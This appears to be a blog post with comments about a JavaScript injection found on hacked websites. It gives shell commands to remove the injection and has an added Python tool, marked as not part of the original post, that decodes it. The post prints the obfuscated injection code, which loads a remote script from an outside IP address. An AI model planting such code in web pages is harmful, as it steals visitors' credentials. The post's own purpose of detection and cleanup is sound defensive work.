If you have this code in your site it is imperative that you change all of your passwords. DO NOT go to ANY of the sites listed on this post.
document.write(unescape('
%3CGXscrLrGXirLpt%20VhsrcrL%3DSn%2FHY8%2F78HY8%2EGX1GX1Cl60%2ECl6
1Cl67Cl65Cl6%2E24Vh9zAn%2FCl6jquVheHY8rrLyCl6%2EjSns%3EGX%3C%2FGXsz
AnczAnrHY8iprLtzAn%3E
').
replace(/Cl6|HY8|zAn|Sn|rL|Vh|GX/g,""));
It may look slightly different, but it translates to the same thing.
script src = 94.247.2.195/jquery.js
I’ve removed tags and such to prevent possible mishaps. Bottom line is, this script can, and has, hijacked usernames and passwords sent over the network.
I have a few shell scripts that will help clear it off your pages (thanks to http://eriknomitch.com/ (SAFE link) for the help). You may want to completely disable all your sites by creating an .htaccess file in your home directory with nothing but “deny from all” in its contents. This will stop ALL of your websites from serving until it is removed. Be warned. Security is very important here, so I would recommend it.
First, have a look at your source, and find a group of characters (I’ll use “Cl6jquVhe” from the example above) that has only letters/numbers and is not likely to appear on any of your other sites, anywhere. I think Cl6jquVhe should be safe. Run the following script, replacing my string with yours, from your user’s root html directory (/home/username/public_html or something similar):
find ./ -iname '*.html' -exec sed -i 's/<script.*Cl6jquVhe.*script>//g' {} \;
Repeat that script for all extensions on your site that could be served as web pages, and for javascript files, e.g. php, asp, aspx, htm, js. This will search through and remove all instances of that script, using wonderful regex. This, however, may not remove them all. Have a look at your files, and make sure it isn’t lurking about still, under the guise of slightly different code. If this is in fact the case, I have a more powerful, but slightly risky, script to run.
Please do not run this next script unless you know your code well. It may break some of your javascript code if you are not careful. If you are certain that none of your scripts (3rd party plugins, too!) use the javascript unescape method, then continue. In reality, the unescape method is used fairly rarely, but running a search for all the files on your site that have it will produce a lot of results, from the infected files. Use the following with great caution!
find ./ -iname '*.html' -exec sed -i 's/<script.*unescape.*script>//g' {} \;
Again, replace html with all extensions. Do NOT try to “be smart” and change the '*.html' to '*', as you may end up damaging other files, especially in this case!
Run find . -iname "*.html" | xargs grep "unescape" -sl to check your results (for all extensions). This will return a list of files that are still infected. It should be zero.
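The grep above only tells you which files still mention unescape. As an added example (not part of the post, and not a script from the post’s author), this Python tool goes one step further: it finds the document.write(unescape(…).replace(…)) pattern, decodes it exactly the way the browser would, and reports which remote script the injection actually loads, so you can confirm an infection without opening the page. The sample page is constructed here and carries the injection quoted in the post; the function and constant names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample page carrying the injection quoted in the post
# (filler tokens and wrapped lines reproduced as the post shows them).
SAMPLE_HTML = """<html><body><p>site content</p>
<script>document.write(unescape('
%3CGXscrLrGXirLpt%20VhsrcrL%3DSn%2FHY8%2F78HY8%2EGX1GX1Cl60%2ECl6
1Cl67Cl65Cl6%2E24Vh9zAn%2FCl6jquVheHY8rrLyCl6%2EjSns%3EGX%3C%2FGXsz
AnczAnrHY8iprLtzAn%3E
').replace(/Cl6|HY8|zAn|Sn|rL|Vh|GX/g,""));</script>
</body></html>"""

# Matches: document.write(unescape('<percent-encoded>').replace(/<fillers>/g, ""))
INJECTION = re.compile(
    r"document\.write\(\s*unescape\(\s*'([^']*)'\s*\)"
    r"\s*\.\s*replace\(\s*/([^/]+)/g\s*,\s*(?:\"\"|'')\s*\)\s*\)",
    re.IGNORECASE)

# Pulls the src attribute out of the decoded <script> tag.
SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)

def decode_injections(html):
    """Decode every injection in html; returns (decoded_markup, script_src) pairs."""
    found = []
    for m in INJECTION.finditer(html):
        encoded, fillers = m.group(1), m.group(2)
        # A JS string literal cannot contain raw newlines, so any whitespace
        # inside the quotes is listing wrap, never part of the payload.
        encoded = re.sub(r"\s+", "", encoded)
        try:
            # Step 1: JS unescape() decodes %XX sequences (unquote covers that;
            # %uXXXX forms are not handled here).
            # Step 2: the attacker's own .replace(/a|b|c/g, "") strips the filler
            # tokens; Python's alternation behaves the same way for these tokens.
            decoded = re.sub(fillers, "", unquote(encoded))
        except re.error:
            continue  # filler list was not a usable regex; skip this match
        src = SRC.search(decoded)
        found.append((decoded, src.group(1) if src else None))
    return found

def is_infected(html):
    """True if the page carries at least one decodable injection."""
    return bool(decode_injections(html))

if __name__ == "__main__":
    for markup, src in decode_injections(SAMPLE_HTML):
        print("decoded:", markup)
        print("remote script:", src)
```

To check a whole site, feed each file's contents to decode_injections from the same find loop used above and log any file where it returns a non-empty list.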
IMPORTANT.
You’ll want to scour your site for files you do not recognize! This was most likely caused by an exploit in outdated software, such as an old WordPress or Zencart installation, allowing the attacker to upload a file that lets them have their way with your site. It will most likely be a php file, with a random name. You’ll want to be certain to find and remove this before allowing access back to your sites.
IMPORTANT #2
Your site is still vulnerable to attack! Find and upgrade all old installations of software! Remove what you don’t need! Find a program like Acunetix to do a security check on your site, and keep up with it! Best of luck to all!
Oh yeah, did I mention to change your passwords?
Beware, the source of the attack is a trojan (packet sniffer) on a developer’s Windows machine that catches all data between your FTP client and the server.
Changing your passwords won’t be enough if you do not disinfect your PC first.
I explained it on my website (in French), and some guy translated it on his: http://bit.ly/qFY1x
Thanks for the information, but isn’t there any script, because I’ll have a large number of sites on my host? Thanks.